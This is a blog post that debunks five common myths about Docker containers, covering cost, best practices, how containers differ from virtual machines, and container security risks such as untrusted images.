As you probably know by now, containers are a high-priority topic at companies of all sizes. But there are a lot of myths surrounding this technology as well, in part because it is new and unfamiliar territory for most, and simply because the technology is so young.
In this post, we’ll debunk five of the pervasive myths and misunderstandings that surround containers, with a focus on Docker (since it is currently the most widely adopted container technology by a sizeable margin). Let’s dive in.
Myth #1: Docker Is a Panacea
Unfortunately, containers are not a panacea. As we explained in Why Docker Can’t Solve All Your Problems in the Cloud, Docker simply doesn’t do everything. Frankly, it’s better to go into your container journey with reasonable expectations about what you can achieve, so viewing Docker as a one-size-fits-all solution isn’t particularly helpful.
If you’re considering adopting Docker to containerize something specific in your platform, that’s a better place to start. Then you can ask yourself: Where are you today in your platform evolution? If you have small software services already broken out, you’re in a good position to get going with Docker and to use it to solve small, specific problems vs. trying to cure every ill.
When it comes to assessing whether your environment is in a good place to start testing containers, the metaphor we often use is cattle vs. pets. To be in a good position to move to containers, you need to be able to treat your environment like cattle, not pets. If you have a high-touch, intensive routine and are continually grooming your servers, you may not be well-equipped to move to containers. On the other hand, if you have a lot of cattle already — i.e., small microservices — and you treat them as such, you may be in a good position to move to containers.
If you already have a collection of things that are well-scoped and loosely coupled, good on you, and containers may very well solve some problems for you. But if you already have a load of process challenges and your approach to application management is very hands-on, you may want to address those issues before you try to move to Docker. You really need to be committed to the concept and practices around immutable infrastructure before you make the leap to containers.
Myth #2: Docker Has a Clear Set of Best Practices...HA!
As with any groundbreaking technology that’s in the rapid-adoption phase of its lifecycle, containers do not yet have a clear set of best practices. Everyone is still figuring out what best practices should look like as they go along — us included! (Let’s be honest.)
While there aren’t cut-and-dry best practices, we do have a pretty good idea at this point about what not to do — just not quite as much about what to do. For example, early on, the thinking went that you didn’t want to host a database in Docker. But now people are running entire search engines (a.k.a. huge databases) in Docker and figuring out ways to make it work. Ivory tower conventional wisdom is being challenged left and right.
It’s OK that the Docker world is full of turbulence right now, but that doesn’t necessarily mean you should steer clear. Just make sure you understand (as well as you can) what you’re getting yourself into.
Taking that one step further, don’t be afraid to try different things and see what works for you. If you can think through the problems you want to solve and clearly define a few experiments, you can probably learn a lot about what is appropriate for your organization. The lack of best practices can be challenging, yes, but it can also be freeing, because it encourages all of us to think outside the box and come up with creative solutions to age-old problems.
Myth #3: Docker Is Always Cheaper Than Virtual Machines
Again, not so fast. From a certain angle, it may seem reasonable to estimate that running containers would be cheaper than virtual machines. After all, if you have 600 AWS instances that are 1 CPU and 4–5 GB of RAM each, perhaps you could use Docker containers to reduce that to 100 instances, with 32 CPUs, and 64GB of RAM. Then you can significantly reduce your AWS costs, since you’ll have fewer instances, right?
That might work for some use cases, at least for a short period of time. But in the longer term, like any other technology trade-off, you’re swapping a certain set of complexities for new ones. And in this case, those new complexities come with a price tag.
For example, when you start running containers at scale, you’ll have to invest in a management and orchestration platform that can manage your containers and their resources. That will require a whole new tech stack. And since there aren’t clear best practices (see Myth #2), you’ll have to accept some trial-and-error (read: lost time and money) along the way.
The math isn’t simple and clear cut, so you want to spend a good chunk of time scoping out your priorities and understanding what it will really cost to switch to containers (and then adding a healthy cushion to that) before you make the leap.
Myth #4: Containers Can Act Like Virtual Machines
Containers aren’t just smaller, more discrete virtual machines. They are a completely separate species. So if you’re using containers like you’re using VMs — or if you’re planning to build a VM in a Docker container — it’s time to take a step back. That would indicate a fundamental misunderstanding that can lead to some major issues.
We encourage folks to think about Docker kind of like a little 3D printer. You input your requirements, and poof! A container appears. Now, this is a whole and self-contained object, and it’s not one you can edit or chip away at (hence the term immutable). If something isn’t quite right or you need a new one, you’ll have to toss it, go back to the printer, and print out a new one.
Make sure that when you make the move to Docker, you are also making the mental and cultural shift to treat containers as a different beast altogether. Ask yourself questions like:
- What does containerizing our app truly mean?
- Do we understand the dependencies?
If you can answer questions like these and build a new workflow that is tailored to containers, then you’ll be well on your way to realizing the benefits.
Myth #5: Docker Has the Same Security Model as Virtual Machines
Many people deploy Docker, thinking it has same security model as virtual machines. Unfortunately, this could not be further from the truth. I like to say that a Docker container is like a ghost of an OS. It is related to an operating system, but it’s not an operating system. Most people use a scaled-back operating system called Core OS to run containers, which frankly can’t do much except run Docker.
Part of the issue is that apps generally still need some of the things a more traditional OS provides. For example, let’s say you build a container from a well-known Linux distribution like Ubuntu. Now your app may feel like it has everything it would need, just as if it were running in Ubuntu. But now let’s say some of your users are pulling down preconfigured Docker images to save time. Do you know where those images are coming from? What’s in them? And by the way, no one’s logging into your Docker containers direct, right?
As you can see, a whole new set of security challenges crops up when you move to containers.
Some of these challenges have arisen because the original goal of “one process, one container” has proven to be fairly difficult to execute on. So people have looked for shortcuts and ways around what is actually a pretty essential feature of containers.
If you hack your way to a containerized environment, you’ll need to build in alerts when something happens that could indicate a security issue. For example, if you build a series of containers to run a Java app, you should get an alert if anything other than Java starts running.
The good news is that containers allow you to get really specific about these types of alerts. You can scope down what you are looking for. But the challenge comes in writing these rules, applying them, and managing them over time.
Don’t Give Up on Docker
Containers are a cool new technology with lots of potential, and in our view, it’s well worth figuring out how Docker fits into your overall strategy. But it’s also good to approach it with open eyes and to make sure you aren’t trying to fit a square peg into a round hole. Understanding the myths that surround containers and making sure you have a clearly defined goal for how you will use them will go a long way toward helping you avoid some of the most common pitfalls.
If you’d like to learn more about what you should consider before moving to containers, have a look at our recent post on Why Docker Can’t Solve All Your Problems in the Cloud.